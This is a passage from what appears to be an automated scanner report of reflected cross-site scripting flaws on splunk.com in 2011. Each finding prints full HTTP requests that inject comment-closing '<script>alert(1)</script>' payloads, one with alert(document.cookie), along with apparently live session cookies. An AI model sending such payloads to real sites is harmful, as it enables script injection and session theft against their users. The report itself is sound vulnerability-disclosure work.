GET /index.php/sso_checker70637--><script>alert(1)</script>77207d79957?return_to=http://splunkbase.splunk.com/account:session/?redir=%2F%3F1ffc5%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E46cc332d1dc%3D1 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://splunkbase.splunk.com/?1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:34:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18742
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the return_to request parameter is copied into an HTML comment. The payload cb2a8--><script>alert(1)</script>e93abf9519f was submitted in the return_to parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php/sso_checker?return_to=cb2a8--><script>alert(1)</script>e93abf9519f HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://splunkbase.splunk.com/?1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:33:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c0d74--><script>alert(1)</script>8f02be6ddd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /industriesc0d74--><script>alert(1)</script>8f02be6ddd8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.408. http://www.splunk.com/industries [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/industries
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 75e78--><script>alert(1)</script>332b08a5ae1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /industries?75e78--><script>alert(1)</script>332b08a5ae1=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:27 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 95797
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload f689f--><script>alert(1)</script>9d4a21b7d08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagef689f--><script>alert(1)</script>9d4a21b7d08/all_experts HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:10 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:10 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:10 GMT; path=/ ETag: c0672478f6ca46e6740bcee5ed5464471296943931 Last-Modified: Sat, 05 Feb 2011 22:12:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8d227--><script>alert(1)</script>da8a26b86d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_experts8d227--><script>alert(1)</script>da8a26b86d4 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:43 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.411. http://www.splunk.com/page/all_experts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/all_experts
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 96742--><script>alert(1)</script>c4667e6c867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_experts?96742--><script>alert(1)</script>c4667e6c867=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:37 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: e01b96203727ff9d6d8991794cf03c091296943897 Last-Modified: Sat, 05 Feb 2011 22:11:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload f24d0--><script>alert(1)</script>6e2f687f5f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagef24d0--><script>alert(1)</script>6e2f687f5f2/all_experts/partner HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:06 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:06 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:06 GMT; path=/ ETag: 53ca885bca9987a6ba65090033be63411296943926 Last-Modified: Sat, 05 Feb 2011 22:12:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload eb983--><script>alert(1)</script>37e17e49981 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_expertseb983--><script>alert(1)</script>37e17e49981/partner HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:36 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 60086--><script>alert(1)</script>4a340830a77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_experts/partner60086--><script>alert(1)</script>4a340830a77 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:19 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 8284e3c5e69fc621f0a7f0694f54f6db1296943999 Last-Modified: Sat, 05 Feb 2011 22:13:19 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.415. http://www.splunk.com/page/all_experts/partner [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/all_experts/partner
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b09ec--><script>alert(1)</script>9d2ae226d37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/all_experts/partner?b09ec--><script>alert(1)</script>9d2ae226d37=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:32 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 3e43cea02b2a149bca9cf3e40bbf22321296943892 Last-Modified: Sat, 05 Feb 2011 22:11:32 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e5a84--><script>alert(1)</script>e63bcaac2f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
